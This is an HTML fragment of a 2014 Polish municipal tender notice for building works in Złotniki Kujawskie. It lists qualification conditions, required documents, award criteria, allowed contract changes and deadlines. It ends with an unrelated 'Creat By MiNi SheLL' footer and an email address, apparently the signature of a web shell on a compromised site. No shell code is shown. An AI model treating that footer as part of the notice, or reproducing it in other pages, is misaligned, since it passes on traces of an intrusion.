<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełnienie     wykonawca  zobowiązany jest udokumentować</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże wykonanie, w okresie ostatnich pięciu  lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie należyte wykonanie: co najmniej dwóch robót polegających na budowie i/lub przebudowie i/lub remoncie  
budynku o wartości   co najmniej 500.000,00 zł każda,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  jeżeli Wykonawca wykaże dysponowanie osobami (min 1 osobą w każdej specjalności), zdolnymi do wykonania zamówienia, które będą uczestniczyć w jego wykonaniu,   w szczególności osobami posiadającymi , uprawnienia budowlane do pełnienia funkcji:
1) kierownika budowy w specjalności  konstrukcyjno - budowlanej,	
2) kierownika robót sanitarnych w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
3) kierownika robót elektrycznych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, ze wskazaniem zakresu wykonywanych przez nie czynności oraz informacją o podstawie do  dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna posiadanie:
a) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej  wysokość posiadanych środków finansowych  lub zdolność kredytową na kwotę nie mniejszą niż 500.000,00 zł.

b) opłaconej  polisy a w przypadku jej braku  innego dokumentu potwierdzającego ,że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  800 000,00   PLN na czas wykonania zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy ,  dowód wniesienia wadium i wykaz podwykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące możliwości zmiany postanowień umowy w stosunku do treści oferty: 
1) zmiany osób występujących po stronie Zamawiającego/Wykonawcy, 
2) zmiana adresu/siedziby/firmy Zamawiającego/Wykonawcy,
3) zmiana postanowień zawartej umowy, w stosunku do treści oferty na podstawie, której
dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych
warunków:
- zajdzie konieczność wprowadzenia zmian w dokumentacji projektowej w sposobie
lub technologii wykonania przedmiotu umowy, a co się z tym wiąże zastosowaniem robót zamiennych i zamiany materiałów i urządzeń przewidzianych do wykonania robót w stosunku do materiałów i urządzeń przewidzianych w dokumentacji projektowej, z zachowaniem wymogów technicznych i jakościowych,
- gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy
okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie
ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania
umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający
dopuszcza możliwość zmiany umowy, a w szczególności terminu realizacji
zamówienia.
4) przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest: 
a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności; 
b) wykopaliskami uniemożliwiającymi wykonywanie robót; 
c) szczególnie niesprzyjającymi warunkami atmosferycznymi i gruntowymi uniemożliwiającymi prowadzenie robót budowlanych  zgodnie ze sztuką budowlaną i wiedzą techniczną; 
d) koniecznością dokonania istotnych zmian w dokumentacji projektowej na wniosek stron; 
e) wystąpieniem siły wyższej; 
5) zmiany w harmonogramie rzeczowo-finansowym robót na wniosek Zamawiającego,  
   Instytucji zarządzającej lub w okolicznościach, za które nie ponosi żadnej  
   odpowiedzialności Wykonawca - na jego wniosek;
6) konieczności usunięcia błędów w dokumentacji projektowej oraz  konieczności 
    przeprojektowania  określonych zakresów  obiektu w trakcie realizacji inwestycji, 
    niezbędnych  do prawidłowego wykonania  przedmiotu umowy;
7) wystąpienie innych szczególnych okoliczności, za które Wykonawca  nie jest 
    odpowiedzialny, 
8) nastąpi zmiana podatku od towarów i usług VAT, kiedy wynagrodzenie brutto zostanie  
   dostosowane do aktualnie obowiązujących przepisów w tym zakresie.

Warunki dokonania zmian: 
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, 
    wyrażoną na piśmie, pod rygorem nieważności, 
b) strona występująca o zmianę postanowień zawartej umowy: 
- opisze zaistniałe okoliczności, 
- uzasadni, udokumentuje zaistnienie powyższych okoliczności, 
- opisze wpływ zmian na termin wykonania umowy. 
c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 
6.Rozwinięcie całości zasad, praw i obowiązków stron realizujących przedmiot 
   zamówienia przedstawia wzór umowy stanowiący załącznik nr 7 do niniejszej 
   specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotnikikuj.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Złotniki Kujawskie , ul.Powstańców Wielkopolskich 6 , 88-180        Złotniki Kujawskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2014 godzina 11:00, miejsce: Urząd Gminy Złotniki Kujawskie ul. Powstańców Wielkopolskich 6,88-180 Złotniki Kujawskie,pokój nr 27 , I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Finansowe wsparcie ze środków Funduszu  Dopłat z Banku Gospodarstwa Krajowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com